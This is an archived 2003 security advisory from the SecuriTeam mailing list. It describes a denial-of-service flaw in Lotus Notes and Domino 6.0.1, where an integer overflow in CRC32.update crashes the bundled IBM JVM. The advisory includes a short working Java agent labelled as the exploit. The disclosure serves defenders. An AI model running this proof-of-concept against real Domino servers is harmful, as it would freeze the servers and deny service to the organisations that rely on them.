[NEWS] Java Agent Freezes Lotus Notes and Domino
From: support@securiteam.com
Date: 04/21/03
- Previous message: support@securiteam.com: "[NEWS] Interbase ISC_LOCK_ENV Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 21 Apr 2003 19:19:51 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Java Agent Freezes Lotus Notes and Domino
------------------------------------------------------------------------
SUMMARY
A vulnerability caused by a specially crafted "agent" causes the IBM JVM
1.3.1 shipped with Lotus Domino 6.0.1 and Lotus Notes 6.0.1 to crash.
After calling the agent, a huge amount of memory is not freed and causes
the server machine (observed on MS XP) to freeze and deny further service.
The following vulnerability is related to our previously published
article: <http://www.securiteam.com/securitynews/5DP0Q0U9GO.html> Denial
of Service Holes Found in JDK.
DETAILS
Vulnerable systems:
* Lotus Notes version 6.0.1
* Lotus Domino version 6.0.1
Analysis:
The call to the "update" method of the CRC32 raises an integer overflow in
the java java.util.zip.* core libraries which triggers a jni routine that
cannot handle the extreme high input value.
Agent code (Exploit):
import lotus.domino.*;
import java.util.zip.*;
public class JavaAgent extends AgentBase {
public void NotesMain() {
try {
Session session = getSession();
AgentContext agentContext =
session.getAgentContext();
CRC32 crc32 = new CRC32();
crc32.update(new byte[0], 4, 0x7ffffffc);
// (Your code goes here)
} catch(Exception e) {
e.printStackTrace();
}
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:schonef@uni-muenster.de>
Marc Schoenefeld.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Interbase ISC_LOCK_ENV Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
